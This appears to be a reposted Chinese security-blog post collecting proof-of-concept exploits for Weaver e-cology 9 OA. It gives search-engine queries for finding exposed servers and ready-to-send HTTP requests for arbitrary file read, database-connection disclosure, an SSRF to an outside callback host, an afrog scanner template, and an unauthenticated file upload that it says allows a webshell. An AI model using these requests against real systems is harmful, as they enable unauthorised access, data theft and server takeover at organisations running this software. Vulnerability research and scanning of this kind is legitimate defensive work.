hunter
app.name=="泛微 e-cology 9.0 OA"
poc
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 Host: {hostname} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/xml Accept-Encoding: gzip Content-Length: 201
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>
获取数据库连接信息
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 Host: {hostname} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/xml Accept-Encoding: gzip Content-Length: 201
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.LoadTemplateProp</methodName>
<params>
<param>
<value><string>weaver</string></value>
</param>
</params>
</methodCall>
泛微E-Cology接口getFileViewUrl存在SSRF漏洞
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
fofa
app="泛微-OA(e-cology)"
poc
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json Upgrade-Insecure-Requests: 1
{
"file_id": "1000",
"file_name": "c",
"download_url":"http://euixlkewfg.dgrh3.cn"
}
afrog poc
id: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
info:
name: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
author: wy876
severity: high
verified: true
description: |-
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
Fofa: app="泛微-OA(e-cology)"
reference:
- https://blog.csdn.net/qq_41904294/article/details/140301289
tags: 泛微,ssrf
created: 2024/07/10
set:
oob: oob()
oobHTTP: oob.HTTP
oobDNS: oob.DNS
rules:
r0:
request:
method: POST
path: /api/doc/mobile/fileview/getFileViewUrl
headers:
Content-Type: application/json
body: |
{"file_id": "1000","file_name": "c","download_url":"{{oobHTTP}}"}
expression: response.status == 200 && oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()
泛微E-Cology-KtreeUploadAction任意文件上传漏洞
泛微OA E-Cology KtreeUploadAction 存在文件上传漏洞,攻击者可通过漏洞上传webshell,达到控制web服务器的权限
fofa
app="泛微-协同商务系统"
poc
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Content-Length: 160 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cache-Control: max-age=0 Connection: close Content-Type: multipart/form-data; boundary=--------1638451160 Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test Upgrade-Insecure-Requests: 1
----------1638451160
Content-Disposition: form-data; name="test"; filename="test.txt"
Content-Type: application/octet-stream
test
----------1638451160--
原文始发于微信公众号(TKing的安全圈):泛微24HW用泛X微e-cology9部分漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论